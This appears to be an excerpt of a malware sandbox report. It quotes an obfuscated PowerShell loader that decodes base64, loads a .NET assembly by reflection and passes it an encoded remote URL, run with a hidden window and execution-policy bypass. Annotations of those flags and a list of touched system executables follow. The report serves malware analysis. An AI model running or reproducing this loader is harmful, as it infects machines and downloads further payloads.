Bv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe